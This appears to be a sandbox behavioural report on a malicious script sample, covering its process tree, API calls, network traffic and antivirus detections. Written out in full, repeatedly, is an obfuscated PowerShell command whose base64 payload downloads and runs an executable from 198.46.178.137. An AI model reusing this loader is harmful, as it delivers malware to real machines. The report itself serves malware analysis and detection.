IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
cmdline "C:\Windows\system32\cmd.exe" "/c pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
cmdline C:\Windows\System32\cmd.exe "/c pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
file C:\Users\test22\AppData\Local\Temp\e3c82su0.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: "/c pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff80000
process_handle: 0xffffffffffffffff
1 0 0
Data received !
Data received HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 09:26:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 03 Jul 2024 00:49:14 GMT ETag: "97200-61c4d330acf1e" Accept-Ranges: bytes Content-Length: 619008 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/lnk MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL  „fà 0: 6 Y ` @ À @…¸X O` 3   H.text09 :  `.rsrc3` 4< @@.reloc   p @BìX HäùÜÕ,ÀÏøˆ0Âs }}}( (({rp"As o {{rp(.% or
Data sent !
Data sent GET /22033/igccu.exe HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: 198.46.178.137 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\e3c82su0.cmdline"
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2628 CREDAT:145409
host 198.46.178.137
file C:\Users\test22\AppData\Local\Temp\e3c82su0.cmdline
Skyhigh BehavesLike.HTML.ExpKitGen2.cx
ALYac VBS.Heur.Asthma.2.3605CD44.Gen
VIPRE VBS.Heur.Asthma.2.3605CD44.Gen
Arcabit VBS.Heur.Asthma.2.3605CD44.Gen
Symantec ISB.Downloader!gen80
BitDefender VBS.Heur.Asthma.2.3605CD44.Gen
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
MicroWorld-eScan VBS.Heur.Asthma.2.3605CD44.Gen
Emsisoft VBS.Heur.Asthma.2.3605CD44.Gen (B)
FireEye VBS.Heur.Asthma.2.3605CD44.Gen
GData VBS.Heur.Asthma.2.3605CD44.Gen
Zoner Probably Heur.HTMLUnescape
MAX malware (ai score=88)
Time & API Arguments Status Return Repeated

send

buffer: !
socket: 476
sent: 1
1 1 0

send

buffer: GET /22033/igccu.exe HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: 198.46.178.137 Connection: Keep-Alive
socket: 1288
sent: 315
1 315 0

send

buffer: !
socket: 476
sent: 1
1 1 0

InternetCrackUrlA

url: http://198.46.178.137/22033/igccu.exe
flags: 0
1 1 0

URLDownloadToFileW

url: http://198.46.178.137/22033/igccu.exe
stack_pivoted: 0
filepath_r: C:\Users\test22\AppData\Roaming\igccu.exe
filepath: C:\Users\test22\AppData\Roaming\igccu.exe
-2146697205 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 09:26:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 03 Jul 2024 00:49:14 GMT ETag: "97200-61c4d330acf1e" Accept-Ranges: bytes Content-Length: 619008 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/lnk MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL  „fà 0: 6 Y ` @ À @…¸X O` 3   H.text09 :  `.rsrc3` 4< @@.reloc   p @BìX HäùÜÕ,ÀÏøˆ0Âs }}}( (({rp"As o {{rp(.% or
received: 1024
socket: 1288
1 1024 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\e3c82su0.cmdline"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\igccu.exe
parent_process iexplore.exe martian_process C:\Windows\System32\cmd.exe "/c pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
parent_process iexplore.exe martian_process "C:\Windows\system32\cmd.exe" "/c pOWErsHell -eX BYpAsS -nOp -W 1 -C DeViCecREDeNtiaLdEPlOYment.EXe ; IEX($(iex('[SysTem.TexT.ENcODiNg]'+[cHar]58+[Char]0x3A+'UTf8.GetstRiNg([SYStEm.cOnvErT]'+[CHaR]0x3a+[chAr]58+'FrombaSE64STrIng('+[CHAr]0x22+'JGFPcXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVSZEVmSW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvRmV2Q3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5VlpFREpQYklxdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEx4cEJRdlJVWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNdm5ESm1ldkJSIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXFOTHFTbHNOICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYU9xcjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTM3LzIyMDMzL2lnY2N1LmV4ZSIsIiRlblY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7c3RBUnQtU0xlRXAoMyk7U3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcaWdjY3UuZXhlIg=='+[Char]0X22+'))')))"
Process injection Process 2628 resumed a thread in remote process 2716
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000354
suspend_count: 1
process_identifier: 2716
1 0 0
option -ex bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -ex bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -ex bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\igccu[1].exe